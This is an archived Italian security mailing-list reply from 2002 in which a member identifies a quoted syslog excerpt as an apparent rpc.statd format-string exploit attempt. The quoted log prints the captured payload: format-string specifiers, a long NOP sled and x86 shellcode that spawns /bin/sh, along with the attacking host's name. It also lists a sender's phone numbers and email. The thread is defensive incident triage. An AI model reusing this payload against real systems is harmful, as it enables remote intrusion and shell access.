Re: [ml@sikurezza] di che si tratta?

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

[ Data: precedente | successivo | indice ] [ Argomento: precedente | successivo | indice ]

Archivio: Giugno 2002 ml@sikurezza.org
Soggetto: Re: [ml@sikurezza] di che si tratta?
Mittente: DarK-Elf
Data: 25 Jun 2002 18:55:39 -0000

ad occhio e croce sembrerebbe proprio un exploit per rpc.statd...
soprattutto "<C7>^F/bin<C7>F^D/shA0<C0>\210F"
non ricordo bene quell'exploit se agisse proprio sulla gethostbyname()
faro' una ricerca, dovrei avere i sorgenti da qualche parte,
se non xploitava quella funzione credo che ci troviamo davanti a un nuovo
xploit...

----- Original Message -----
From: "Maurizio Marini" <maumar@datalogica.com>
To: <ml@sikurezza.org>
Sent: Sunday, June 23, 2002 8:36 PM
Subject: [ml@sikurezza] di che si tratta?


Jun 23 09:20:58 ns syslogd: Cannot glue message parts together
Jun 23 09:20:58 ns /sbin/rpc.statd[262]: gethostbyname error for
^X<F7><FF><BF>^X<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8
x%8x%8x%62716x%hn%51859x%hn\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
\220\220\220\220\220\220\220\220\220\220\220
Jun 23 09:20:58 ns
<C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\211<F3><B0>^K<CD>\200
<B0>^A<CD>\200<E8>\177<FF><FF><FF>
Jun 23 09:21:08 ns tcplogd: sunrpc connection attempt from apollo.crimson.se
[213.88.198.160]

--
Maurizio Marini http://www.popup.it
CosT Srl Via Longhi, 13 - 20137 Milano
Tel. Direct (+39)02 45446 202 Fax +39-2-45446333
mailto:maumar@datalogica.com   GSM +39-335-8259739


________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List




________________________________________________________
http://www.sikurezza.org - Italian Security Mailing List

In risposta a:
- [ml@sikurezza] di che si tratta?, Maurizio Marini

Data:
- precedente: Fw: ACM TechNews, Raistlin
- successivo: era: Consiglio su conf. firewall - II parte (lungo pure questo ma no conf !!), Ing. S. Centineo - AMAP S.p.A.
- indice

Argomento:
- precedente: [ml@sikurezza] di che si tratta?, Maurizio Marini
- successivo: Re: [ml@sikurezza] di che si tratta?, Andrea Di Giovanni
- indice

[ Home | Liste | F.A.Q. | Risorse | Cerca... ]

www.sikurezza.org - Italian Security Mailing List
(c) 1999-2005